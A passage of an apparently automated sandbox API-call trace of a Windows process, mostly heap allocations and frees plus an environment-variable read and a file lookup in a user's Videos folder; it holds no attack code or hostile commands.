[0212.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0212.738] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaff0 [0212.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf00 [0212.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0212.738] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0212.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0212.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0212.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0212.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0212.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0212.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0212.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0212.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0212.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74ab8 [0212.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0212.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0212.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0212.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0212.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0212.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721e8 [0212.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0212.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0212.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0212.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0212.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0212.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0212.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0212.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0212.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0212.741] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0212.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0212.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0212.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0212.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0212.741] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0212.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0212.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0212.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0212.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0212.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0212.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0212.742] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0212.742] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0212.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0212.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0212.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0212.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0212.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0212.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0212.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0212.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0212.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0212.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0212.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0212.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.743] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0212.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0212.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0212.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0212.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0212.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0212.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0212.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0212.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0212.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0212.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0212.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0212.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0212.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0212.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0212.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0212.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0212.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0212.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0212.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0212.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0212.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0212.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0212.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0212.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0212.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0212.745] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0212.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0212.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0212.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0212.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0212.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0212.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0212.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0212.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0212.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0212.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0212.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0212.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.745] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0212.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0212.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0212.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0212.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0212.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0212.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0212.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0212.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0212.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0212.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0212.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0212.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0212.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0212.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0212.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.746] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/PkICTcvFSPf3s9J", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x57202740, ftCreationTime.dwHighDateTime=0x1d5ccf0, ftLastAccessTime.dwLowDateTime=0x3e85ef50, ftLastAccessTime.dwHighDateTime=0x1d5d1ad, ftLastWriteTime.dwLowDateTime=0x3e85ef50, ftLastWriteTime.dwHighDateTime=0x1d5d1ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PkICTcvFSPf3s9J", cAlternateFileName="PKICTC~1")) returned 0x9e1cb8 [0212.746] FindClose (in: hFindFile=0x9e1cb8 | out: hFindFile=0x9e1cb8) returned 1 [0212.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0212.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0212.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.747] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0212.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0212.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0212.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0212.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0212.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0212.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0212.748] RtlAllocateHeap (HeapHandle=0x2af0000, 